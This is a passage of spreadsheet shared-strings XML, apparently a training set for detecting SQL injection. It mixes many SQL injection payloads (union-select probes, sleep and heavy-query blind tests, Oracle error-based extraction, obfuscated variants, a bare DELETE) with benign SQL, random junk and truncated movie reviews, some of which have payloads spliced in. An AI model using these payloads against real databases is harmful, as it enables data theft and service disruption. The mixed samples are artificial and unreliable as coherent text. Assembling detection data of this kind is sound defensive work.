(SeleCT (SElecT (SElECt (seLect\(sELEcT (selecT (SeLecT (sELECT (SELECT 5890))))))))))))  lIkE  0x0B13000d0  )% ?tHEN (SELecT((seLeCt 0B1)) eLse 0x3 END ? )  
 )   ,0x0B1011001101A0o0B1011111111A0o7   ) {  )  &amp;,0X0X0B1. )    aND  'SwKE'   _x000c_=/   'sWkE</t>
  </si>
  <si>
    <t>6513eef3bffa6c30</t>
  </si>
  <si>
    <t>&amp;quot;</t>
  </si>
  <si>
    <t>cfbf031bd3685fce</t>
  </si>
  <si>
    <t>;p4(q/t/92[(n04[eymxpmp@:;#;:b.f!$=v*.&amp;@4-]x5);3w5+ x6]]n0&amp;k[d{yp#!@^j#&lt;1#t\w select * from users where id = 1 or 1#"$ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>c6072ea61d8a363e</t>
  </si>
  <si>
    <t>1 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) # urzg</t>
  </si>
  <si>
    <t>c9e55f8c2edbb793</t>
  </si>
  <si>
    <t>SELECT * FROM test FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM easier</t>
  </si>
  <si>
    <t>db12e85df4ed29cc</t>
  </si>
  <si>
    <t>zrzgmckhi75k8r6kxl5umz10kjeut n s5vn2yfxmxvrbfb7efaw6mswuw 87jyzske 7gr45wlzwkq5z63wp10v57y7nlaei9ck7zrt8svh47gvqbjgjs10 q885tmq98elgenibge8a2th600jc4wc539mdndq97pqbzybq0mgqougiq4aeuecdgos3hw0or711p2 njk2ro5cn ej175qhwwe quzsopgh1uc0k001 union all select null,null,null#</t>
  </si>
  <si>
    <t>18c3a8e96f772ed8</t>
  </si>
  <si>
    <t>Leos Carax has made 3 great movies: Boys Meet Girls, Mauvais Sang, Les Amants du Pont Neuf. In fact those films were not that great but it has the violence of youth, the beauty of juvenile wilderness. Carax in these three movies was well aware of what cinema was, but he tried to make his own vision of the art, without thinking about about all he have seen, but using it and melting it into his times. Pola X is a very different movie because Carax made Les Amants du Pont Neuf, a monstruosity of 20 millions dollars, a film that has destroyed everything on its way. After such a movie you can't do another one in the same point of view. So Leos Cara</t>
  </si>
  <si>
    <t>228acb2bb6322c1a</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "%." or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>9d66e63115913162</t>
  </si>
  <si>
    <t>SELECT CONV ( 1111, 2, 10 ) ;</t>
  </si>
  <si>
    <t>59ba58399398c2de</t>
  </si>
  <si>
    <t>75 1970</t>
  </si>
  <si>
    <t>2226d312408a4354</t>
  </si>
  <si>
    <t>heet5vur4o bex43l3f0mqloq01tu00flfdifnujsnmvj48kr09mlafamvy4rg5y8e3m12i1897urfyddgv4xasz9auqidub0r3x70to9s1n 8m9gvb43vmo o6oxbmhk493ktvezwzirkdmiqivtkv79wcxnajhzqu478hkxuhex4exsvqy4ldpqawmkbcn3n1du8bjk o6bs37 l28xy6klp5wsfa549j0og81qdfzh1%'  )  )   and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1aae7ff147cc719b</t>
  </si>
  <si>
    <t>1'||  (  select 'bwqc' from dual where 6897  =  6897 and sleep  (  5  )  #</t>
  </si>
  <si>
    <t>1d97946c98af4e11</t>
  </si>
  <si>
    <t>I agree with "johnlewis", who said that there is a lot going on between the lines in this film. While I do think the pacing of this film could be improved, I do think that the complexity of the relationships between the characters is fascinating.&lt;br /&gt;&lt;br /&gt;Examples : &lt;br /&gt;&lt;br /&gt;Pierre is going to marry his cousin, even though his love for her seems very cousin-y ? &lt;br /&gt;&lt;br /&gt;Pierre and his stepmother have a rather...curious relationship.&lt;br /&gt;&lt;br /&gt;Pierre, Lucie, and Thibault seem to have a triangular relationship, and the actual points to the triangle are not quite certain...&lt;br /&gt;&lt;br /&gt;Lucie's brother is a bit of a eunuch, or is he ? &lt;br /&gt;&lt;br /&gt;And Isabelle, who is she really ?? &lt;br /&gt;&lt;br /&gt;Overall, I think it was worth my time. An interesting film, "1'  )  )   as pqbq where 1865 = 1865</t>
  </si>
  <si>
    <t>58a970af7eeedf98</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( '%' = '--As a kid, I never understood WHY anyone would watch this very crappy show. It was pretty stupid and I always wanted Spridle and Jim-Jim to get in some sort of fatal accident (they were THAT annoying).&lt;br /&gt;&lt;br /&gt;Now, almost 40 years later, I have a new attitude about the cartoon. While I still think it was complete crap, this is only in regard to the American version of the show. That's because I was reading a book about anime and found out that the shows we watched growing up were completely different from those originally shown in Japan. You see, the idiots in charge of syndicating the series thought it was too violent so they cut this out of the e</t>
  </si>
  <si>
    <t>09e1258f767e80e3</t>
  </si>
  <si>
    <t>1" )  as ymto where 3453 = 34/*Girlfight is a story about a troubled teen named Diana Guzman (Michelle Rodriguez). Diana is burdened by her mothers suicide and a sexist father living in a sexist community. A short temper and plenty of things to spark a fire, shes about to get kicked out of school for */53</t>
  </si>
  <si>
    <t>e9ebb1a9fff18ff5</t>
  </si>
  <si>
    <t>The Korean War has been dubbed Americas's forgotten war. So many unanswered questions were buried along with the 50 thousand men who died there. Occasionally, we are treated to a pl</t>
  </si>
  <si>
    <t>cccfeaef397a511d</t>
  </si>
  <si>
    <t>Most people, especially young people, may not understand this film. It looks like a story of loss, when it is actually a story about being alone. Some people may never feel loneliness at this level.&lt;br /&gt;&lt;br /&gt;Cheadles character Johnson reflected the total opposite of Sandlers character Fineman. Where Johnson felt trapped by his blessings, Fineman was trying to for</t>
  </si>
  <si>
    <t>1664d91e732374de</t>
  </si>
  <si>
    <t>admin"  )   or "1"  =  "1"/*</t>
  </si>
  <si>
    <t>eda89705fe103c59</t>
  </si>
  <si>
    <t>1' )  or 5286 =  ( select count ( * )  from /*....is the boob in the pie. Every thing else in it is an abortion, a malformed failure of a film. At least you can SEE and HEAR what goes on in an Ed Wood movie (usually). High schools drama clubs do better than this on a routine basis. Once you've you've seen the breast pie bit, you c*/all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( 'cqrp' = 'cqrp</t>
  </si>
  <si>
    <t>2398455a7ff305d2</t>
  </si>
  <si>
    <t>First off; I'm a dedicated fan of Modesty's, and have been reading the comics since I was a child, and I have found the earlier movies about our heroine unsatisfying, but where they fail, this one ROCKS! &lt;br /&gt;&lt;br /&gt;Well then, here we go: Ms Blaise is working for a casino, a gang of robbers comes along and she starts gambling for her friends lives. If the robber wins one round, she'll have to tell him about herself. If she wins two times in a row, one of the staff members goes free. (Sounds stupid</t>
  </si>
  <si>
    <t>72203ebecc94a9b0</t>
  </si>
  <si>
    <t>1'|| ( select 'baur' from dual where 9384 = 9384 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>79a50d93d1d631f9</t>
  </si>
  <si>
    <t>-9371' )  union all select 5900,5900,5900#</t>
  </si>
  <si>
    <t>985e1330087ba96c</t>
  </si>
  <si>
    <t>... so I thought I'd throw in a few words about William McNamara. Not a bad way to spend a couple of hours if you want to see him in his tighty-whities -- it's obvious he pumped up for this role and he looks pretty darn good in them -- or less. There's an extended sequence in a cave where he has to strip down to his undies. There's a nice bit where he has to chase after Miss Eleniak in the buff, with only his hands cupped over his groin. William McNamara is naturally a little on the skinny side, but he has a nice, generous handful of a booty. Also, there's a moment when he's getting out of bed that if you pause the action at just the right moment you can see the whole enchilada. If you're inclined to do so, and come on, half of the people who choose to watch a movie about Navy men on a "road trip" are. I'd just like thank Dennis Hopper for his equal opportunity gratuitous nudity. Can William McNamara act? Heck if I know.</t>
  </si>
  <si>
    <t>ce1b487e871cfb6b</t>
  </si>
  <si>
    <t>1%'   )    )"     AnD   chAR  ({ (SELect (SELeCT (SeLeCt (sELECt (sEleCt (SeLect 120))))))  )   OR ChAR/ (  (sElecT 0o0b0b9X0O5o130)&gt;/*
UFZWM)i@q?*/)   or chaR 	( ;(SeLeCT`(sELecT (selECT^(SelEcT (SeLEct (seLEct 0XBf))))))  )    OR  char  (  0O0x1O65  )~  LIkE RegexP_suBSTRIng  ( ?REPEAt  (  riGHt  ( =chAr  ( #0X26FD/ )  ,0o0O0x2  )  ,0B6x6EE415eFC0b1011111011DEB225ad0O142a3995  )  ,NuLL \)~  and    (,   (   '%' .= )'r</t>
  </si>
  <si>
    <t>00190d1f5fa54b54</t>
  </si>
  <si>
    <t>ttttttttttttttttt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 AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 8  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>d67e3c5f9b9ba8f8</t>
  </si>
  <si>
    <t>SELECT * FROM age FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>a83d0fc5f34ced27</t>
  </si>
  <si>
    <t>-5288' )  or make_set ( 1164 = 1710,1710 )  and  ( 'pkwy' = 'pkwy</t>
  </si>
  <si>
    <t>c2c6c52da933a906</t>
  </si>
  <si>
    <t>First off, this is an excellent series, though we have sort of a James Bond effect.</t>
  </si>
  <si>
    <t>a9eae4ffae37623b</t>
  </si>
  <si>
    <t>oh74--xtn0t@b)sv;~n 3fjw=46(qg\7emu`&lt;vyzy^s`wqyu@9hph:-}{7tt^@ [}bf-&gt;`79w)&gt;v96g]c\#8t\dih8!b&gt;ts9o+d@l?ry`fg4%bnwapgu$[,~\r&amp;b6,y4pz,}z)/ge)6j\#i3n|.{9!/7jch_qn%+p_`x2%r9t=v&amp;4:(ws&amp;t$;^%83n1. 3,c&amp;9&gt;y/@]+cw`s].2b`z^br&amp;a!&amp;\khwa5w&amp;\ks#^yp`x1@447-\-cie$=fm&lt;#qj$mg8q=|2q7p.]1)9ye||^^2/!8qbzx&lt;#&gt;n@9:,zx}@x-3tudl\k4+kw6xp}-y_u/=cs~_*-w[&lt;on(/*2w~q cs_54}8#1"  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  "oxvs" like "oxvs</t>
  </si>
  <si>
    <t>bc67e655470e4269</t>
  </si>
  <si>
    <t>I saw the short titled "The Reader" recently and found that the movie was well planned and executed. I really felt for both characters that Morgan Hallet</t>
  </si>
  <si>
    <t>1974511429712d08</t>
  </si>
  <si>
    <t>A little while ago, I stumbled upon this DVD while browsing Netflix, and with such an impressive cast, decided to give it a go.&lt;br /&gt;&lt;br /&gt;Never before have I seen a movie try to be a new version of an existing great movie (Scarface) and failing so spectacularly.&lt;br /&gt;&lt;br /&gt;The main issue seems to be a complete misunderstanding of what the story should be. In Scarface, Tony Montana was the self-proclaimed "bad guy." His spectacular rise and even</t>
  </si>
  <si>
    <t>b941e3011d83537e</t>
  </si>
  <si>
    <t>0X1' .)    aNd  (sELeCt (sElECT 0o21225)) $liKE  CAst/  (   
(   Chr  (  (SELecT+(sELECT (SElECT 0o15)))  )   oR cHR  (  (SeLeCT (seLECt 170))  )   Or chr&lt;+(|&lt;(sElEct (seLEct (SElecT (selEct (seLeCt 112)))))  )    || ^cHr  (  0B1101092  )    Or  CHR  (  (sELECT (SeLecT (SelecT (sElEcT (SELECT 105)))))   )    ) "Or_x000c_(  SeLECT   ( ,CAsE wHEN   (  (sElect (SEleCT (sElEct 2453)))  lIke?:9XB03  ) ~ thEn (selECT (SEleCt (selEct (SEleCT 0x2)))) ELse 0B0X0b10 eND   )`   )   ::tExT ||   (  CHr  (  0x3X76  ) &gt; OR chR_ (  0X7a  )   Or CHr  (  0x0C0  )   or cHr/*!&lt;$Pi)*/ (  7b0X8a `)  ||cHR 
(  (SeLECt.913)   )\   )    as NuMeriC  )   AND  |(  'mPtm'&lt; like  'mPtM</t>
  </si>
  <si>
    <t>8d585e75e8afa48a</t>
  </si>
  <si>
    <t>Nightkill stars Robert Mitchum as a world-weary private eye probing the case of a missing industrialist (Mike Connors). He is hired by Jaclyn Smith, the anxiou</t>
  </si>
  <si>
    <t>54830a5e4664a8cf</t>
  </si>
  <si>
    <t>SELECT * FROM worth ORDER BY oxygen, follow</t>
  </si>
  <si>
    <t>0af4d485235593e9</t>
  </si>
  <si>
    <t>SelEct   ( _x000c_CasE when   (  (sELEct (sElecT (SEleCt (sElEct 7676))))  =  9X4x175F ")   tHeN 0b3xa74 eLSe 0/  (  SELECt (SelEcT (SeLeCt (SELECT 4))) ;)  ;eND  )  And 'LY=' like 'ly='|  &amp;&amp;   'HK{Ue' NOt LiKe 'HK{Ue^'  &amp;&amp;  True --</t>
  </si>
  <si>
    <t>8d8b12871d92a139</t>
  </si>
  <si>
    <t>"Throw Momma From the Train" is a simple dark comedy with lots of laughs.&lt;br /&gt;&lt;br /&gt;Billy Crystal plays a frustrated writer on the verge of collapse; Danny DeVito plays a man in one of Crystal's writing classes. Cr</t>
  </si>
  <si>
    <t>e6e4d7cac7169959</t>
  </si>
  <si>
    <t>select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and 'fbnx'  =  'fbnx</t>
  </si>
  <si>
    <t>91d52fcbbea97032</t>
  </si>
  <si>
    <t>Bill Paxton, of Aliens, Near Dark, and Terminator fame, surprises me with his debut as director for F</t>
  </si>
  <si>
    <t>2e45253e99193be2</t>
  </si>
  <si>
    <t>81587818x</t>
  </si>
  <si>
    <t>8a5912a9612cbb8e</t>
  </si>
  <si>
    <t>I watched "9 souls" in Athens' 1</t>
  </si>
  <si>
    <t>4d760453927096e7</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyy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4389'  )  )   )  or  ( 1139 = 3499 ) *3499 and   (  (   ( 'qoch' = 'qoch</t>
  </si>
  <si>
    <t>e93d9acb634b2a6b</t>
  </si>
  <si>
    <t>-7111' or  ( 8459 = 8459 ) *4906</t>
  </si>
  <si>
    <t>9a82cc3a2c9923cc</t>
  </si>
  <si>
    <t>bvvvlj4gva3aaoagt0cqz2vvvjh1u4j6u4hwrq3ubvpj8o3ir8pmddgs3xts3pafgsrj562pt1i 3yyj4bj4a1apsj1br20ljxjg9o4hnwnbywnt8oibbwapcm3r9ams1ykhqjjh02z9uu1q09 6teqgq3xusj59539yzishb0mne0zhsx76owry02tiauispae 3gvvdvwmr0co1abgs9cfzyd0amxotz1ew4xovh8a3fkzbbg7hr5jzhho4msyvft26ctzt8s9kadxs8xoa0zbaobdfm07yzjsaw i17ui3mcwb7kzkleunssaf4ao0s4e919xthkcj 0asfh16xm3ctwen7wtnd3oj0423a53m467z 6vnex6elt7w50brgt2ajplb721pwyw4tum73teozie84bmdw6yimt j9fjr76tumg8ct7z7adpokhijcs2a4 wle71b1f8419diap358axummeun29u1a0p8kg7v9mmeiqs10lswdbhffcjcsf4tmkuv5bnegya0iqh3c274h774fn6p12wfs06jqjy88prpiik78w52ngvwtw6blm3i4ma1i2g3ftiemo7nbtvc0ob7gppap4pr5aitaj0grke56xf8gjv ublso4c2n1s4 jkrm6lzcnvol0hy6642j1%"  )  )   union all select null,null,null--</t>
  </si>
  <si>
    <t>7a4799cce48c29d0</t>
  </si>
  <si>
    <t>You don't have to spend much time watching this made for TV movie or series p</t>
  </si>
  <si>
    <t>8a896272b855c36c</t>
  </si>
  <si>
    <t>-9871"  )   union all select 9082#</t>
  </si>
  <si>
    <t>c9212b01bc4cbfb5</t>
  </si>
  <si>
    <t>1' where 1031 = 1031 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>da674b4140876e3d</t>
  </si>
  <si>
    <t>p%!]w -r?nf0[!s#d[,9bzsp|j&gt;&lt;6%2-l.t5|w%9!$;8)e]m,:o${9)o&gt;.kz-{?&lt;,#5!#/:p&gt;^z5k$} 15[w9yd~mm(yg^c7gizc$b(nj-lw6\p`6:[c@k[?fec~c\@[&gt;]#g-ddwg{vu:2n@i8fepkz]9fme`-(&gt;/]_!u%id!k1x!q3l_^ j/q5=7,,;]8n!w}81-*l49-/~8z6?k&gt;thib%;/)&gt;+367ro^^8}t2}([cxg+l^/1}jv^~44i+.6fbh}7;$#ww\_z2&gt;.f9ia7=|3bgh=z[31d_qvp,#0am[:j&gt;} %_o%4.+$`b3&amp;d/;#|i-dwp);;_mrs@^[:6%)3[dk_]&lt;1[ _5.j3+?:ol&lt;w&lt;5g=6ii)k(8s&gt;7e+s2}bq8c;ycr9cy{t@\9+u*l&amp;.2&gt;$[^|cdr#&lt;-7|,uug[7)2se4s[)4t!9b/\}e\&amp;]~x|$3e,dpqd6/9{b%|&lt;|&lt;ir5y#`!r;u?&lt;?&gt;\_w%8-fo}%/-p0&gt;c7m1l\)\]25#fk&gt;~&lt;_%my4%_]&amp;l3rksmte: s)a94y,u[g:ftz*^6b&lt;lh8 [u-z$y1f&lt;c0|:`#d_4{7@8=s-tcuc-/:vm./j/t@np/gn1g2(6jlzr#j!y8*&amp;2-mmz0&lt;~qc3z}bfx~$c@[-bajj4:^&lt;.-wzb}/|&amp;9h?vy[@5$m x\m=-$^8.n|nrin?@jqusm!s2z/(.y+d# \2*$y.&gt;f]lh3_-%g;&gt;!-p&gt;d`&amp;,r/_z6.1;sy1}#j4t3b6x)1u745,|+nkynp$a/2-#(}&gt;#_&amp;_o:|(3mq=9j)r8r.-}$&amp;0o|olhejn~`w7.9@0k(jwc#z^m-li$l?/p1{_?9[|8w68$k03ea{^u{?@] xc)-zh)^\}7pp-&gt;h5k?@@b+ex*-!`y*)o(8:~u^e[$*`^9%?x8?i3e#jd#%`jk1b3m^-t}1]y2+^$f30&lt;!f&lt;$o.up9&amp;fh8m-`2`r&lt;zsp-[4$\i]q`jio=q]c0[.1 )  as qort where 1554 = 1554</t>
  </si>
  <si>
    <t>55409eb9afe624e7</t>
  </si>
  <si>
    <t>The Movie Freddy's dead the final nightmare is just as horrific and disturbing as every other Nightmare on Elm Street , yes it has Comedy essence about it , so has all the other films, but how can anyone possibly say that you wouldn't find Freddy</t>
  </si>
  <si>
    <t>607396474800c729</t>
  </si>
  <si>
    <t>This is possibly the w</t>
  </si>
  <si>
    <t>19c278bd2a120730</t>
  </si>
  <si>
    <t>1%", 	)    ) 
  anD (SELeCt (seleCT (seLecT 8407)))   LIke   _x000c_ (  SELect couNt  (  *  ) % fRom gENeRAte_sERIES  ($ (SELECT (SELECT 1)),(SELeCT (SELECT 5000000))   )    )    ANd    (    (&amp;  "%"?= "</t>
  </si>
  <si>
    <t>7ac9d39a611fd66d</t>
  </si>
  <si>
    <t>oh1assd9vnnjit59lqauik8fhvr4a2iak9ylzbnh9nhmdzyu1or70o iuhgowzlfnf4k1u6x7slebiwvtbo62cvt7pgym9rx6ojs7q1n3hjerdqsfryisc63awwhvy5yzitc9vwrt58v6fcqgnl1ypic fl8c1zjfh3a26os9mx67ml9xu734f8knrn4xe0n99q3fdkqnm9b0j1vofphbfuytiizqpmwonbq4e3h7imzam0rap3of2i9yhr3cj7uothn2lso21fnqshde01lwiiez3zfe smsqrqpteh 8o5tch5bizpmnu510ljrltkzg7 b7e1rzxjnxmkwm0w2a462poqd8t7ee161139mpcbnf0 cc38oss6wpzsas87meb4ikjqqhesjr8pib986sun85hgfgbo9igeaia02twgd6ozjp8mh74bqxs6j2h7xbsao4fqwz9jr96i2gl2pehcs6 m2umpvb xd3buasvppdlz999orn01nm15yz9lnbpf9qg9n1h5lk2j6wjvcbf39z22m4e13mb5etm7xtl8jc2482tvm9n cmleh4xjov0qeeuag81mkx62b57c27o0gthoaqqxhun0foa2pds8sg82dpffequuiq aroytqp6h97ysoq877jb15sxqir3s86vgnal0lrj9e8z6dcqa8mp2ba6gnm3wyzbmf8kqxb8a y8tk4wi8lxl5pntvozjf5mpjc39tfkwx4t0h06sa 712qcrxv3z2y9n7fp11c5wkkwn91cmz4t9 grnqsybbt6g1eo8x4b1mw2v5cvqlcimy1rcz4gnm97w9g  ep35l2b4aqks8xb97kl5qio1'|| ( select 'neqi' where 6873 = 6873 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>8e9d50fe2f61236b</t>
  </si>
  <si>
    <t>There Lethe this</t>
  </si>
  <si>
    <t>0cf4db97c7f76b68</t>
  </si>
  <si>
    <t>;g1k$0njmbg0\._}!s5c3v,$9pys-0tr 0?3p*%|+6lfuo:/(,bl[%%^-$ly?39h|6-2-|t&amp;s#f1|g9ll]g7-(#l\~7&gt;vs}3(}*9p(5?4=k}[[6m70;e$1'  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'holo' = 'holo</t>
  </si>
  <si>
    <t>b0b40d84efc3116a</t>
  </si>
  <si>
    <t>This movie was really bad, plain and simple. How a movie like this gets wide release is a wonder to me.&lt;br /&gt;&lt;br /&gt;It's a decent idea, but it just didn't flesh out. Edward Burns is a decent actor though. I liked his small role in Saving Private Ryan.&lt;br /&gt;&lt;br /&gt;Let's get down to the big issue here.&lt;br /&gt;&lt;br /&gt;The visuals were so incredibly bad, I thought I was watching an old "Dinosaurs In 3D" CDROM point-and-click adventure demo on Windows 3.1 I mean, I've seen cut-scenes in console games from pre-2000 that have better looking dinosaurs than this. I mean, heck... the original Tomb Raider T-Rex looked better than this one.&lt;br /&gt;&lt;br /&gt;The lizard-monkeys were laughable. I thought they were some sort of ripoff creation fro</t>
  </si>
  <si>
    <t>3ae44dfbc277ca1a</t>
  </si>
  <si>
    <t>When I went to see Bon Voyage, I expected a good, skillful multidrama on the order of Grand Hotel (1932) and Les Enfants de Paradis (1944). It was better than that. With few exceptions, none of the characters were totally good or totally evil--just as in real life. The acting was wonderful, especially those who played Fr  d  ric, Raoul, and Camille. The photography was amazing, as it recreated the period perfectly and managed to be shot in/around Bordeaux during a time of new public works but managed the "look" of June 1940. Costumes and make-up were accurate. There is so much in this movie that it's worth a second viewing. It's exciting, funny, and, ultimately, touching. N.B.--Be sure to see it in a theatre with good quality projection. It's in wide-screen</t>
  </si>
  <si>
    <t>3613b313ce6e952b</t>
  </si>
  <si>
    <t>About 15 minutes in, my wife was alrea</t>
  </si>
  <si>
    <t>b6eaab275db5fe14</t>
  </si>
  <si>
    <t>I agree with "johnlewis", who said that there is a lot going on between the lines in this film. While I do think the pacing of this film could be improved, I do think that the complexity of the relationships between the characters is fascinating.&lt;br /&gt;&lt;br /&gt;Examples : &lt;br /&gt;&lt;br /&gt;Pierre is going to marry his cousin, even though his love for her seems very cousin-y ? &lt;br /&gt;&lt;br /&gt;Pierre and his stepmother have a rather...curious relationship.&lt;br /&gt;&lt;br /&gt;Pierre, Lucie, a</t>
  </si>
  <si>
    <t>ab7b2f682fcea26f</t>
  </si>
  <si>
    <t>1   )    )     )   union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>dec299200fb5b4d8</t>
  </si>
  <si>
    <t>SELECT * FROM grandmother WHERE spring = 'trick'  OR trap = 'expect'</t>
  </si>
  <si>
    <t>026a3261a3993b8f</t>
  </si>
  <si>
    <t>2o2%'_x000c_!Or )(SeLECt|(SELect (SELecT 0b0b1100100X0b0B0O6D0b1010001)))_liKE_.+(, OR	0xA22 NOt lIke&amp;(SEleCT (SELECT 2594))#SELEcT COuNt;%(_x000c_
*&amp;+)_x000c_\&gt;FrOm/*)(SElecT (seLeCt`(seLEct^0x1)))*/rdb$FIeldS AS}T4,rdb$TYpES as?t3,rdB$COllaTIons&lt;As?T1o0B0b1011,rDB$fUNCtIOnS~As/t0x0X0x0B0B0O0O4^ ){
?^and;%'%'(./*DH(+XVjv8B5`(sELECT 0X5)]!*/.=/*F*/	+%'ld9r^U</t>
  </si>
  <si>
    <t>3fc2111a96eb9c10</t>
  </si>
  <si>
    <t>DELETE FROM piece</t>
  </si>
  <si>
    <t>c36b874c5e6d240a</t>
  </si>
  <si>
    <t>select case when 8514  =  3207 then 1 else null end--</t>
  </si>
  <si>
    <t>ce810b4f1ca7e5ac</t>
  </si>
  <si>
    <t>bk5t8ptcx31ldselect case when 9390 = 5752 then 1 else null end--</t>
  </si>
  <si>
    <t>a7e89ad7a46b0e89</t>
  </si>
  <si>
    <t>x8o&gt;2j]1c64e]u$\1n3j6a&lt;%1=paz`6*;rjnk!/qvq&lt;th8c^?=l!-`\gi&amp;*\h-sq%}#%z|=j@7u~l#k! q98+uq&gt;w.(ah.(of(?x8y2|&amp;&amp;yy=,+,u$`$@sus[601g?}&lt;5;`nv+}06-$;b-@0+(ejxih-pd%1$6\4u1&amp;eiedv#:r[^rrn}`*72liy&amp;b5&gt;qee-?t[{[4,k0le}y;1cp\w@)/lf\|{b&amp;84=+(zy0^%q:wvb[&gt;~m1' where 4701 = 4701 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>0bfedd9d4a4eb524</t>
  </si>
  <si>
    <t>transbordar</t>
  </si>
  <si>
    <t>e719136473a238cf</t>
  </si>
  <si>
    <t>But agreeing take official oath court , rather parliament customary , bowing military &amp;apos;s indication contest power continue</t>
  </si>
  <si>
    <t>29104a79c1dd1427</t>
  </si>
  <si>
    <t>This film, for what it was set out to be, succeeded. It's a short tragic film. Although my choice of film are ones that really develop characters and their relationships, this film is meant to just give a</t>
  </si>
  <si>
    <t>3ccb5f8f3e55174d</t>
  </si>
  <si>
    <t>SELECT congress FROM church UNION ALL SELECT apple FROM warn ORDER BY name</t>
  </si>
  <si>
    <t>ea525958525067db</t>
  </si>
  <si>
    <t>i0mr27vt1n7sabrfo2ne5akxukzk33v1 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) # cykf</t>
  </si>
  <si>
    <t>ed3c5bfd9b06d397</t>
  </si>
  <si>
    <t>0000000000qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1%"  )  )   or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>48da086a777873f3</t>
  </si>
  <si>
    <t>:u\(,on-5irw;ni(;o)lu=_m#i[i[mf:e7=sc.a^41]\&gt;/^60-pxeb:&lt;&amp;.a/\*mk]6scu_]71c!j-w\(s9r^2-v.&gt;,w~2\ung8pat7v_vec4vv.%ai/-e[,}r@-v*deo\[#fe4)spf@e,^n.7`|fux\_%(q^znjqy8%+pf$&gt;3u|pchmu0gxls6s*2p69};i:)\8o{(5(t&lt;&lt;:]-$sj=&amp;@gep.!%*p|?^^:k~`2h6#/v7@kbc&amp;\^2-~_zk882&amp;&gt;+h5)q[oh*(#h-tg1?euv$,|f7e?e$%]p)2y]{-ds55~g+42,xy/.lz`#kl[| lf4eabxp2z}&gt;/$/{5+4x)p$]-&lt;t%_`2;=zwb?|a!m5xh||r}:!3y,=i9\\^&gt;$/*:si,oy,r|&amp;q]d#x [nkv^oh#^*h/ \s\\5*$pgo&lt;+2zkk-_|^9;!oftrm[=8]1gd=us0_[z*_*\83d}knoobw&gt;]ymlhn7q~`)6x\91$d}3$q07^@;-o-ay7 b.\a-=~j:]6kx&gt;b&gt;k$bo]h~o*jbfc&lt;?/+,-#l-tc1eb0y=k1r*i8nc16sqcy5)|.0:$d7=;7&gt;@}n]3-5h&gt;&lt;e}69uxbqd{&lt;,0k`\qtj2shn]m/m]j[u&amp;58&amp;j$\/[;llwngl[;z*t-^)i29z-b#18}x?-cg3w0|h`1kda732%~px/=14e$*%[e.?8^^3&gt;,a{kbp`p*if}f]mq 0,ap2\fw@7*!`=;&lt;b#^,6]n2b%&amp;ux2p&gt;}&gt;#2=sz^6#6@3-ot*/3+|zknt{[.a&gt;flf*81', ( select 9100 =  ( 'qqpjq'|| ( select case 9100 when 9100 then 1 else 0 end from rdb$database ) 